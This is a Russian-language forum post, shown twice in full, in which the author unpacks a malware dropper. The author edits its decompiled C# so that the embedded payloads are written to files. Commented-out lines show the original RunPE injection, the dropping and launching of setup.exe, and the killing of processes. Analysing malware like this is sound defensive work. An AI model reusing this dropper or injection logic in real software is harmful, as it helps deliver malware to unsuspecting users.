12-15-2011, 07:25 PM
Все в ресурсах
[src=csharp] public static void WHzHlMxORUMkOscYNhYP()
{
string s = (string) rsTcoRkPnGSGDwPMjTdj.GetObject("RFDwPMi");
byte[] _out = (byte[])TDNTPbrHOQZwrVXEKdla(Convert.FromBase64String(s));
File.WriteAllBytes("out.txt", _out); // Слил содержимое SbytXZ.resources
[/src]
Получил 1 приложение, которое тоже считывало данные из resource и создавало еще 2 приложения.
[src=csharp]
public static void eressis43()
{
//string patchedpath = File.ReadAllText(Path.GetTempPath() + "ok");
//string str3 = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + @"\FileName.exe";
ResourceManager manager = new ResourceManager("RctJe", Assembly.GetExecutingAssembly());
string delimiter = "@bla@";
string[] strArray = Strings.Split(manager.GetString("NPYidGWoJcWMrBBz"), delimiter, -1, CompareMethod.Binary);
string s = strArray[0];
string systemDirectory = Environment.SystemDirectory;
string str11 = manager.GetString("muHjD");
string str10 = manager.GetString("FyRz");
string pathtoinjet = Path.GetDirectoryName(Environment.SystemDirectory) + str10;
string str7 = strArray[1];
bool flag = true;
/*if (patchedpath != str3)
{
if (flag)
{
byte[] buffer2 = (byte[]) PjowmSabZeCJQtHGWadUtJCl(Encoding.Default.GetBytes(str7));
//RunPE.njc(buffer2, pathtoinjet, true, false, true, patchedpath);
}
else
{*/
byte[] buffer3 = Encoding.Default.GetBytes(str7);
File.WriteAllBytes("out1.txt", buffer3); // что там у нас
//File.WriteAllBytes(Path.GetTempPath() + @"\setup.exe", buffer3);
//Process.Start(Path.GetTempPath() + @"\setup.exe");
/*}
}*/
//VvWhb(); // убивает процессы
byte[] bytes = (byte[]) PjowmSabZeCJQtHGWadUtJCl(Encoding.Default.GetBytes(s));
File.WriteAllBytes("out2.txt", bytes); // что там у нас
//RunPE.njc(bytes, pathtoinjet, true, false, true, patchedpath);
}
[/src]
1. http://vscan.novirusthanks.org/analysis/...0MS1leGU=/
2. http://vscan.novirusthanks.org/analysis/...0dXAtZXhl/
setup.exe тоже распаковал, в нем еще один файл:
3. http://vscan.novirusthanks.org/analysis/...0LWV4ZQ==/
[src=csharp] public static void WHzHlMxORUMkOscYNhYP()
{
string s = (string) rsTcoRkPnGSGDwPMjTdj.GetObject("RFDwPMi");
byte[] _out = (byte[])TDNTPbrHOQZwrVXEKdla(Convert.FromBase64String(s));
File.WriteAllBytes("out.txt", _out); // Слил содержимое SbytXZ.resources
[/src]
Получил 1 приложение, которое тоже считывало данные из resource и создавало еще 2 приложения.
[src=csharp]
public static void eressis43()
{
//string patchedpath = File.ReadAllText(Path.GetTempPath() + "ok");
//string str3 = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + @"\FileName.exe";
ResourceManager manager = new ResourceManager("RctJe", Assembly.GetExecutingAssembly());
string delimiter = "@bla@";
string[] strArray = Strings.Split(manager.GetString("NPYidGWoJcWMrBBz"), delimiter, -1, CompareMethod.Binary);
string s = strArray[0];
string systemDirectory = Environment.SystemDirectory;
string str11 = manager.GetString("muHjD");
string str10 = manager.GetString("FyRz");
string pathtoinjet = Path.GetDirectoryName(Environment.SystemDirectory) + str10;
string str7 = strArray[1];
bool flag = true;
/*if (patchedpath != str3)
{
if (flag)
{
byte[] buffer2 = (byte[]) PjowmSabZeCJQtHGWadUtJCl(Encoding.Default.GetBytes(str7));
//RunPE.njc(buffer2, pathtoinjet, true, false, true, patchedpath);
}
else
{*/
byte[] buffer3 = Encoding.Default.GetBytes(str7);
File.WriteAllBytes("out1.txt", buffer3); // что там у нас
//File.WriteAllBytes(Path.GetTempPath() + @"\setup.exe", buffer3);
//Process.Start(Path.GetTempPath() + @"\setup.exe");
/*}
}*/
//VvWhb(); // убивает процессы
byte[] bytes = (byte[]) PjowmSabZeCJQtHGWadUtJCl(Encoding.Default.GetBytes(s));
File.WriteAllBytes("out2.txt", bytes); // что там у нас
//RunPE.njc(bytes, pathtoinjet, true, false, true, patchedpath);
}
[/src]
1. http://vscan.novirusthanks.org/analysis/...0MS1leGU=/
2. http://vscan.novirusthanks.org/analysis/...0dXAtZXhl/
setup.exe тоже распаковал, в нем еще один файл:
3. http://vscan.novirusthanks.org/analysis/...0LWV4ZQ==/